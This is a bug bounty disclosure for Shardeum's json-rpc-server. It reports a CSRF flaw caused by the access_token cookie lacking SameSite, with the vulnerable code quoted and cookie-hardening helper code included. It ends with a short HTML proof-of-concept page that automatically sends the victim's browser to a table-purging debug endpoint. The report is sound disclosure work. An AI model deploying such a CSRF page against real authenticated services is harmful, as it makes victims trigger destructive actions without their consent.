# Boost | Shardeum: Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to mi

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/)

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: <https://github.com/shardeum/json-rpc-server/tree/dev>

Impacts:

* CSRF vulnerability allowing blackhat to perform authenticated actions
* Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

## Description

## Brief/Intro

The `access_token` cookie is set without the `SameSite=Strict` attribute, which leads to a CSRF vulnerability allowing a BlackHat to perform authenticated actions.

## Vulnerability Details

In `src/routes/authenticate.ts`

```ts
router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})
```

After authentication, the RPC server does not set the `SameSite=Strict` restriction on the cookie, so a malicious website can make the victim's browser call the authenticated `GET` API endpoints, which perform actions such as purging tables, modifying config values, node subscription, etc.
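The following is an added example, not code from the shardeum/json-rpc-server project, showing the cookie attributes that close this hole and a small model of the browser's SameSite decision. It makes one point the report only implies: because the affected debug endpoints are state-changing `GET` routes reached by a top-level navigation, `SameSite=Lax` (Chromium's default when the attribute is absent) still sends the cookie, so `Strict` or a server-side cross-site check is needed. All helper names (`HARDENED_COOKIE`, `buildSetCookie`, `effectiveSameSite`, `cookieWouldBeSent`, `rejectCrossSite`) and the one-hour lifetime are assumptions for illustration.

```typescript
// Added example, not code from the shardeum/json-rpc-server project.
// All helper names below are hypothetical.

type SameSite = 'Strict' | 'Lax' | 'None';

interface CookieOptions {
  httpOnly: boolean;
  secure: boolean;
  sameSite: SameSite;
  maxAgeSeconds: number;
}

// Attributes the access_token cookie should carry instead of
// { httpOnly: false, maxAge: ~a month } with no SameSite at all.
export const HARDENED_COOKIE: CookieOptions = {
  httpOnly: true,         // page scripts cannot read the token
  secure: true,           // sent over HTTPS only
  sameSite: 'Strict',     // never attached to a cross-site request
  maxAgeSeconds: 60 * 60, // assumed one-hour lifetime instead of ~700 hours
};

// Serialise a Set-Cookie header value. Express's
// res.cookie(name, value, { httpOnly, secure, sameSite: 'strict', maxAge })
// emits the same attributes.
export function buildSetCookie(name: string, value: string, opts: CookieOptions): string {
  const parts = [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${opts.maxAgeSeconds}`,
    'Path=/',
    `SameSite=${opts.sameSite}`,
  ];
  if (opts.httpOnly) parts.push('HttpOnly');
  if (opts.secure) parts.push('Secure');
  return parts.join('; ');
}

// Policy a browser applies when the cookie has no SameSite attribute:
// Chromium defaults to Lax, other engines behave as None.
export function effectiveSameSite(attr: SameSite | undefined, browserDefaultsToLax: boolean): SameSite {
  if (attr !== undefined) return attr;
  return browserDefaultsToLax ? 'Lax' : 'None';
}

// Model of the browser's decision to attach a cookie to a request.
// sameSiteRequest: the initiator's site equals the cookie's site.
// topLevelNavigation: a link click or document.location change;
// false for fetch/XHR/img/iframe subresource loads.
export function cookieWouldBeSent(
  policy: SameSite, sameSiteRequest: boolean, topLevelNavigation: boolean, method: string,
): boolean {
  if (sameSiteRequest) return true;
  if (policy === 'Strict') return false;
  if (policy === 'None') return true;
  // Lax: only top-level navigations with a safe method carry the cookie.
  // A GET to a state-changing debug route is exactly that case.
  return topLevelNavigation && (method === 'GET' || method === 'HEAD');
}

// Defence in depth for state-changing GET debug routes: refuse requests the
// browser marks as cross-site, using Fetch Metadata first and Origin/Referer
// as a fallback. Header names are lower-cased, as Node's http module delivers
// them. Returns true when the request should be rejected.
export function rejectCrossSite(
  headers: Record<string, string | undefined>, allowedOrigins: string[],
): boolean {
  const fetchSite = headers['sec-fetch-site'];
  if (fetchSite !== undefined) {
    // 'none' means user-initiated (typed URL, bookmark); anything else
    // that is not same-origin came from another site.
    return fetchSite !== 'same-origin' && fetchSite !== 'none';
  }
  const source = headers['origin'] ?? headers['referer'];
  if (source === undefined) return false; // no hints (e.g. curl); cookie policy is the backstop
  try {
    return !allowedOrigins.includes(new URL(source).origin);
  } catch {
    return true; // unparsable Origin/Referer: treat as hostile
  }
}
```

`rejectCrossSite` is meant to run before any of the `/log/*` or config routes handle a request; it does not replace the cookie fix, since a client that sends neither Fetch Metadata nor Origin/Referer is let through and only the `SameSite` policy then decides.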

## Impact Details

* The vulnerability allows malicious websites to perform actions such as purging tables, modifying config values, node subscription, etc.
* The vulnerability could result in deletion of debug data.

## References

<https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18>

## Proof of concept

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>csrf performing authenticated action</title>
</head>
<body>
  <h1>calling /log/cleanTxTable which will trigger purging of table that store transaction logging</h1>
  <a href="http://127.0.0.1:8888/log/cleanTxTable">click here to attack</a>

  <script type="text/javascript">
    function callAutomatically() {
      document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically, 3000);
  </script>
</body>
</html>
```

## Steps to Reproduce

1. Authenticate to the RPC server with the password.
2. Save the PoC file as `csrfpoc.html`.
3. Open `csrfpoc.html` in the browser you authenticated to the RPC server with.
4. Either click on `click here to attack` or wait 3 seconds for the attack to happen automatically.
5. You will see the response `{"success":true}`.

